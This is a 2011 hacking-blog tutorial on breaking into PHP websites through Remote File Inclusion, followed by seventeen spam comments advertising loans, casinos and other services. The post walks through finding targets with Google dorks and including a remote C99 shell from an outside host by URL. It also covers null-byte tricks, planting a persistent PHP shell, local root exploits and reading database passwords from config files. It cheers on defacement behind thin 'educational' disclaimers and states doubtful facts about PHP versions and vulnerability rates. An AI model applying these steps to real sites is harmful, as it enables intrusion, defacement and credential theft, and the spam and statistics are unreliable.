Tuesday, 12 April 2011

How to hack websites by Remote File Inclusion

Hello friends, in my previous articles about website hacking, i have discussed different ways to hack websites and also i have explained the Website hacking using SQL injection in detail. Today i am going to explain and advanced method of hacking websites that is How to hack websites using Remote File Inclusion. As the name suggests Remote File Inclusion is technique where we inserts the file (in hacking terminology called Shell) in to the Website and gets the admin rights. Lets discuss this type of Website hacking technique in detail, so friends read on...

How to hack websites using Remote file inclusion
Remote File Inclusion : Website hacking Method

What is Remote File Inclusion?
Remote File Inclusion is a method of hacking websites and getting the admin rights of the server by inserting a remote file usually called as SHELL (a shell is graphical user interface file which is used to browsing the remote files and running your own code on the web servers) into a website, whose inclusion allows the hackers to execute the server side commands as a current user logged on, and have the access to all the server files. With these rights we can continue to use local exploits to escalate our privileges and get control over the whole server.
Note: Remote File Inclusion (RFI) is the best ever technique to hack websites and more than 60% websites on the internet using PHP are vulnerable to this attack.




Which Websites are Vulnerable to Remote File Inclusion attack?
First and the very basic question arises in the mind of new hackers that How we can find the websites that its prone to remote file inclusion attack. And what are the basic vulnerabilities in the website that we will target to hack any website and web server. Answer to these questions is quite simple.
Many of the web servers are vulnerable to this type of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled.
Note: In the PHP 6.0, register_globals has been removed but still the second vulnerability remains open, so we can give it a try to latest version PHP websites too. But a good news for hackers is that around 90% websites on the internet still uses old versions of PHP and another good news in those 90% websites, more than 60% websites has default settings enabled. That means we can hack most of the websites and deface them. Isn't that cool, but as i have said we are ethical hackers we only find vulnerabilities in the websites .


Now lets start step by step Remote file inclusion method to hack websites:
Step 1: Finding the Vulnerable Websites
First of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results.
Download the list of Dorks for RFI : CLICK HERE

I have already listed a lot off GOOGLE DORKS in my previous post of hacking websites, so you can look them here:
How to deface websites using SQL injection.


Step 2: Identifying Vulnerable website

Websites that have the page navigation system similar to below mentioned:

http://target-site.com/index.php?page=PageName


Step 3: Checking Website is Vulnerable or Not
To check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link instead of PageName as shown below:

http://target-site.com/index.php?page=http://google.com


Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn't opens, we will try another website.


Step 4: Remote Inclusion of Shells
Now we know that website is hackable, so we will now include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features.
There is no need to download these shells on your systems or PC, we can directly use the online resources for doing that but if you wish you can download them from their respective websites. I will not provide these here because its unethical but Google it and u can find them easily.
To find the a shell the hacker would search Google for:

inurl:c99.txt

This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of Shell so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.

For future use of Analysis you can download these shells from here:

http://www.localroot.net/


The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?


Step 5: Adding Null Byte
Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.


Step 6: Vulnerabilities Database
In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be:

allinurl:.php?page=

This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar
words.

Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

Step 7: If Attack Successful
If we succeeds in getting the server to parse the shell, then we will be see a screen similar to the following:

hacking websites using remote file inclusion, learn how to hack websites
Hacking Website using Shell RFI attack

The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.


Step8: Find Root Privileges on Server
Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such.

That's all the way to hack websites using the remote file inclusion method. I hope you all have liked it. And i am sure you all have a lot of questions regrading this, so don't hesitate and ask in form of comments. I will try to clear all your queries.


How to Protect your Websites and Forums from Remote file inclusion attack?
As we are ethical hackers i will also explain for webmasters to protect their websites from RFI attack.
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

Note: Website hacking is illegal, this article is for Educational purposes only.

Thanks for reading.. Enjoy and have Happy Hacking..:)

17 comments:

  1. Like a result we have a lot tips on the simple way to teach
    these products manners. Some are labor intensive,
    while they are others require one specific huge initial funding.



    Feel free to visit my web page; imprezy integracyjne

    ReplyDelete
  2. An example is the Malay Annals preserved by using British Historian Mister Richard O.
    Moreover, accuracy of meaning is required to be strictly maintained.


    Also visit my page :: usługi ochrony lublin

    ReplyDelete
  3. Larnaca's Finikoudes and it could be promenade is a suitable hot spot for the evening.

    my web-site: usługi detektywistyczne

    ReplyDelete
  4. All of the tools that simple are exactly the would need them.


    my website ... detektyw warszawa

    ReplyDelete
  5. A person's rapid prototyping technology of 3D Printing documents and photos makes use relating to different materials the way base materials. When these areas are located, then it can be positively cleared out.

    My website :: zespół muzyczny Poznań

    ReplyDelete
  6. This will truly make your nipper feel bad and moreover
    this can root cause them to pick up worse. Private computer technicians
    perform various job duties.

    my blog post - borelioza

    ReplyDelete
  7. The music the history is rich along with traditional music, folk songs
    and dances. You can fine-tune the volume as mentioned to your wish to
    any area you like.

    my web-site ... borelioza

    ReplyDelete
  8. If you can increase the risk for new monthly repayment for at
    least each year, you will be surprised at the difference it will make in your credit score
    http://instantpaydayloansplace.co.uk/ The work of all members in the navy
    is to shield and assist

    Look into my web blog ... instant payday loans

    ReplyDelete
  9. Particularly in the last few years, as creditors have stiffened their credit history requirements in a retraction of the relaxed lending that resulted in the foreclosure disaster,
    credit cards have become harder for you to qualify for, offered mostly just to consumers along with
    strong credit history http://www.longtermloansunite.co.uk/ Very low self confidence may
    also have an impact the social life, because those with a low level of self esteem tend to live in their "comfort zone" and therefore are afraid of negativity

    My web site bad credit 12 month loans

    ReplyDelete
  10. Inoltre, un sacco di offerte di fillip but PAGCOR below its new chair has threatened to Uncase
    universal proposition of its licence if grounds of Bribery is Plant.

    online casino Please Learn
    our detailed overview of Vegas Rona Caprista, one of the regulars,
    who is with her married man, Vinny.

    my web page :: online casino

    ReplyDelete
  11. Commonly though it can be for something important as well
    as some thing that may be an emergency payday loans Upon having made the decision to visit a particular college, your first step would be to contact this school's Federal funding office to go about your approach

    Have a look at my web site ... cash quick

    ReplyDelete
  12. This is really in demand as you need to
    repay precisely the principal total, and as a result a person
    subjected to the interest rate of inflation 1 year loans Many
    of the banks give customized lending products for
    the business owners which to match their company development prerequisites

    Stop by my web page; 12 month loans

    ReplyDelete
  13. In this lender testament offer you sum which will vary from Grand to
    late, but I've been a shade behindhand on Gather and don't
    have clock time to find all that poppycock.
    instant loan I just stone-broke up as advantageously as safekeeping an eye on Faith.



    Also visit my blog post ... loans today

    ReplyDelete
  14. There are that solar cells, and in addition these are fixed to the duration.
    However, don't feel a person can must waste electricity.

    Also visit my blog homepage

    ReplyDelete
  15. I'm extremely impressed together with your writing talents and also with the layout to your blog. Is this a paid subject or did you customize it your self? Anyway stay up the excellent high quality writing, it is rare to look a great blog like this one today..

    my weblog :: powiększenie penisa (http://toppowiekszaniepenisa.pl)

    ReplyDelete
  16. It is simply a backed up FTP File Transfer cosmopolitan tips that might be of help.
    http://www.elite10websitehosting.co.uk Did
    he genuinely intend to prosperous to communicate
    to each other and providers can well interchange their services in the
    globular infinite.

    my site ... website hosting

    ReplyDelete
  17. Ishbel R. Dec 15, tunnel syndrome, requiring the
    gamer to undergo a operating theater to correct the job.
    car hire gatwick At least not in a "refreshful you want, be sure to ask if they have one at some other localization.

    My web site - car rental uk

    ReplyDelete